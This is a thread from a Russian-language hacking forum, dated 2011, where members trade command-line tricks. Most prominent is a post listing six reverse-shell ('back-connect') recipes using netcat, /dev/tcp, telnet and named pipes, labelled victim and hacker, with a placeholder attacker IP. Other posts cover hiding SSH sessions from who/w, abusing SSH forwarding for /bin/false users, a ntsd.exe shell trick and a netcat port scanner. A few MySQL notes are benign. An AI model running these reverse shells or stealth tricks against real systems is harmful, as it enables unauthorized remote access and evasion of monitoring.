Старый 03.04.2011, 14:45   #31
SynQ
 
Регистрация: 11.07.2010
Сообщений: 954
Репутация: 352
По умолчанию

Иногда бывает нужно там, где mysql нет, статичный:
mysqldump Ver 10.13 Distrib 5.1.56, for pc-linux-gnu (i686)
static, stripped линк
SynQ вне форума   Ответить с цитированием
Старый 27.04.2011, 12:12   #32
SynQ
 
Регистрация: 11.07.2010
Сообщений: 954
Репутация: 352
По умолчанию

Получение cmd шелла на вин-машинах стандартными средствами через ntsd.exe:
http://www.securityaegis.com/ntsd-backdoor/
SynQ вне форума   Ответить с цитированием
Старый 27.04.2011, 16:04   #33
M_script
 
Регистрация: 06.07.2010
Сообщений: 113
Репутация: 33
По умолчанию

В запросе mysql нельзя использовать имя одной базы или таблицы в разных регистрах.

верно:
Код:
SELECT * FROM tablename WHERE tablename.columnname=1;
SELECT * FROM TableName WHERE TableName.columnname=1;
неверно:
Код:
SELECT * FROM TableName WHERE tablename.columnname=1;
SELECT * FROM tablename WHERE TableName.columnname=1;
M_script вне форума   Ответить с цитированием
Старый 27.04.2011, 19:42   #34
apache3
 
Регистрация: 13.01.2011
Сообщений: 22
Репутация: 3
По умолчанию

чтобы не было видно по who/w и тд

ssh host /bin/sh


полноценного терминала нет,но он в принципе и не нужен.

в системных логах светитесь.
apache3 вне форума   Ответить с цитированием
Старый 27.04.2011, 20:15   #35
ArtOfHack Slon
 
Регистрация: 06.04.2011
Сообщений: 11
Репутация: 3
По умолчанию

apache3, с ключем -i смотрится намного симпатичней

ssh хост "/bin/sh -i"

// а за наводку спасибо, не приходила раньше такая мысль в голову
ArtOfHack Slon вне форума   Ответить с цитированием
Старый 15.06.2011, 22:52   #36
python-ptrace
Banned
 
Регистрация: 07.07.2010
Сообщений: 16
Репутация: 14
По умолчанию

Цитата:
Сообщение от Strilo4ka Посмотреть сообщение
Следующая команда выполнит рекурсивное применение правил для всех файлов в текущей директории, а также для всех файлов во всех поддиректориях:

# find . -type f -exec chmod 777 {} \;

Следующая команда выполнит рекурсивное применение правил для всех директорий в текущей директории, а также для всех директорий во всех поддиректориях:

# find . -type d -exec chmod 777 {} \;
все гораздо проще:
chmod -Rf 0777 ./*
python-ptrace вне форума   Ответить с цитированием
Старый 06.07.2011, 10:19   #37
SynQ
 
Регистрация: 11.07.2010
Сообщений: 954
Репутация: 352
По умолчанию

Юзеру с /bin/false как шелл заблокированы sftp и сам доступ по ssh, однако форвардинг по-прежнему работает с -N и -R/-L.
SynQ вне форума   Ответить с цитированием
Старый 14.07.2011, 19:47   #38
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Варианты бекконектов встроенными средствами

================================================== ==================
1#

Жертва:

Код:
$ mknod backpipe p && nc хекер_ip 3337 0<backpipe | /bin/sh 1>backpipe
Хекер:

Код:
$ nc -n -vv -l -p 3337
================================================== ==================
2#

Жертва:

Код:
$ nc хекер_ip 3337 -e /bin/sh
Хекер:

Код:
$ nc -n -vv -l -p 3337
================================================== ==================
3#

Жертва:

Код:
$ /bin/sh -i > /dev/tcp/хекер_ip/3337 0<&1 2>&1
Хекер:

Код:
$ nc -n -vv -l -p 3337
================================================== ==================
4# - без netcat и /dev/tcp/

Жертва:

Код:
$ mknod backpipe p && telnet хекер_ip 3337 0<backpipe | 1>backpipe
Хекер:

Код:
$ nc -n -vv -l -p 3337
================================================== ==================
5# - сервер ждет, когда мы присоединимся на порт 3337

Жертва:

Код:
$ nc -l -p 3337 -nvv -e /bin/sh &
Хекер:

Код:
$ nc -nvv сервер_ip 3337
================================================== ==================
6# - telnet to netcat

Хекер (открываем два терминала сразу, освобождаем два порта - 3337[ввод команд] и 31337[отображение результатов]):

3337:
Код:
$ nc -n -vv -l -p 3337
31337:
Код:
$ nc -n -vv -l -p 31337
Жертва:

Код:
$ telnet хекер_ip 3337 | /bin/bash | telnet хекер_ip 31337
в терминале с портом 3337 набираем команду (например 'ls -la'), в терминале с 31337 видим результаты

Последний раз редактировалось Pashkela; 14.07.2011 в 19:50..
Pashkela вне форума   Ответить с цитированием
Старый 15.07.2011, 02:14   #39
tex
 
Регистрация: 26.12.2010
Сообщений: 135
Репутация: 41
По умолчанию

Цитата:
Сообщение от apache3 Посмотреть сообщение
чтобы не было видно по who/w и тд

ssh host /bin/sh


полноценного терминала нет,но он в принципе и не нужен.

в системных логах светитесь.
ssh -T host
Цитата:
-T Disable pseudo-tty allocation.
tty кстати потом можно будет подключить сторонним софтом на хосте- это при необходимости к примеру для su, ввод будет кривой но ругатся на отсутствие терминала не будет )




Цитата:
Сообщение от Pashkela Посмотреть сообщение
Варианты бекконектов встроенными средствами
хекер:
nc -l 3117|nc -l 3118

жертва:
nc 127.0.0.1 3117|sh|nc 127.0.0.1 3118

вместо nc также телнет может быть
tex вне форума   Ответить с цитированием
Старый 15.07.2011, 02:31   #40
tex
 
Регистрация: 26.12.2010
Сообщений: 135
Репутация: 41
По умолчанию

подручный сканер хостов
Цитата:
for a in {1..255};do nc -w 1 -z 192.168.1.$a 80;done
tex вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot